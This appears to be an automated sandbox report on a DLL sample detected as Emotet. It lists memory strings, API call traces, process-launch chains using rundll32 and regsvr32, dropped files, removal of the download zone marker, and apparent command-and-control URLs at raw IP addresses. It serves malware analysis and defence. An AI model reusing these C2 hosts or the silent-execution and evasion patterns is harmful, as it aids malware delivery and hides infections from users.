                      Source: svchost.exe, 00000018.00000003.636242685.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636284410.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636264427.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636298329.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636333190.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636344572.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636370804.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636357149.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636166889.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636188041.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.637100433.000002554B971000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636016846.000002554B981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636224370.000002554B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.636314319.000002554B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z||.||58dfb4d5-be7e-424e-8739-cac99224843f||1152921505695035586||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000005.00000003.538445333.0000000003352000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.954006400.0000000003352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.836929466.0000019586090000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.684487522.000002554B900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000000D.00000002.836929466.0000019586090000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.684378033.000002554AEEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: regsvr32.exe, 00000005.00000003.538445333.0000000003352000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.954006400.0000000003352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabQ
                      Source: regsvr32.exe, 00000005.00000003.538445333.0000000003352000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.954006400.0000000003352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en6
                      Source: svchost.exe, 00000018.00000003.654122875.000002554B9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654040928.000002554B991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654068801.000002554B9A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000D.00000002.836571481.00000195808AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.dmtf.o
                      Source: svchost.exe, 0000000D.00000002.836571481.00000195808AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/
                      Source: svchost.exe, 0000000D.00000002.836571481.00000195808AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeratio
                      Source: regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/
                      Source: regsvr32.exe, 00000005.00000003.481253554.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQd
                      Source: regsvr32.exe, 00000005.00000003.481253554.000000000331E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQdF
                      Source: regsvr32.exe, 00000005.00000003.481253554.000000000331E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQdT
                      Source: regsvr32.exe, 00000005.00000003.481253554.000000000331E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/v
                      Source: regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110/
                      Source: regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110/6.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQd
                      Source: regsvr32.exe, 00000005.00000002.953979215.0000000003347000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.538622366.0000000003347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110:8080/gECMlLDhVoiKFtzKjjRUPjlZHZhhxfpHLqiKeXIlMdFcRqaPxeg
                      Source: svchost.exe, 00000018.00000003.654122875.000002554B9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654040928.000002554B991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654068801.000002554B9A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000018.00000003.650938728.000002554BE1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650909580.000002554B9B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651038741.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650818268.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650841411.000002554B9A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651011860.000002554BE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650968671.000002554BE1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 00000018.00000003.654122875.000002554B9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654040928.000002554B991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654068801.000002554B9A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000018.00000003.654122875.000002554B9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654040928.000002554B991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654068801.000002554B9A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000018.00000003.650938728.000002554BE1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650909580.000002554B9B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651038741.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650818268.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650841411.000002554B9A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651011860.000002554BE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650968671.000002554BE1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000018.00000003.650938728.000002554BE1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650909580.000002554B9B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651038741.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650818268.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650841411.000002554B9A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651011860.000002554BE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650968671.000002554BE1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 00000018.00000003.659846928.000002554B991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.659413155.000002554BE18000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.659476166.000002554B9A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.659437692.000002554BE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.659235634.000002554B9A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10032A2D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,2_2_10032A2D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003437E GetKeyState,GetKeyState,GetKeyState,2_2_1003437E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002FE1B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,2_2_1002FE1B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003437E GetKeyState,GetKeyState,GetKeyState,3_2_1003437E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001D99B __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,3_2_1001D99B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10032A2D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,3_2_10032A2D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002FE1B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_1002FE1B

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 2.2.regsvr32.exe.49b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4290000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4c70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3110000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.42c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3110000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.49e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.49b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4d70000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4290000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.440856153.00000000049E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.438019180.00000000049F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.440822056.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.438281451.0000000004290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.954167693.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.438313364.00000000042C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.954213063.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.437810837.0000000003110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: 9818t9ks1s.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile deleted: C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.che:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Bvqee\Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001409B2_2_1001409B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100239732_2_10023973
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1000DB7F2_2_1000DB7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001409B3_2_1001409B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100239733_2_10023973
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010A0C3_2_10010A0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000DB7F3_2_1000DB7F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10011BF0 appears 53 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10012514 appears 39 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10011BF0 appears 118 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10012514 appears 47 times
                      Source: 9818t9ks1s.dllStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: 9818t9ks1s.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9818t9ks1s.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9818t9ks1s.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: 9818t9ks1s.dllVirustotal: Detection: 69%
                      Source: 9818t9ks1s.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9818t9ks1s.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllRegisterServer
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.che"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllUnregisterServerr
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9818t9ks1s.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllUnregisterServerrJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.che"Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@19/5@0/58
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10006120 FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,2_2_10006120
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_CURSOR
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_BITMAP
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_ICON
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_MENU
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_DIALOG
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_STRING
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_ACCELERATOR
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_GROUP_ICON
                      Source: 9818t9ks1s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 9818t9ks1s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 9818t9ks1s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 9818t9ks1s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 9818t9ks1s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10010B20 push eax; ret 2_2_10010B34
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10010B20 push eax; ret 2_2_10010B5C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10011BF0 push eax; ret 2_2_10011C0E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001254F push ecx; ret 2_2_1001255F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001254F push ecx; ret 3_2_1001255F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010B20 push eax; ret 3_2_10010B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010B20 push eax; ret 3_2_10010B5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10011BF0 push eax; ret 3_2_10011C0E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10025CEC __EH_prolog,LoadLibraryA,GetProcAddress,2_2_10025CEC
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9818t9ks1s.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exePE file moved: C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.cheJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.che:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Urxuhfwuvdoqo\fwicd.dee:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fwtalcmqgixd\btngtvbvsro.wfo:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10007AE5 IsIconic,GetWindowPlacement,GetWindowRect,2_2_10007AE5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10007AE5 IsIconic,GetWindowPlacement,GetWindowRect,3_2_10007AE5
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6164Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6524Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6228Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-16333
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 2.8 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.6 %
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10010839 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,2_2_10010839
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_1002592C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,3_2_1002592C
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-16334
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-22388
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 00000018.00000002.684176363.000002554AE70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
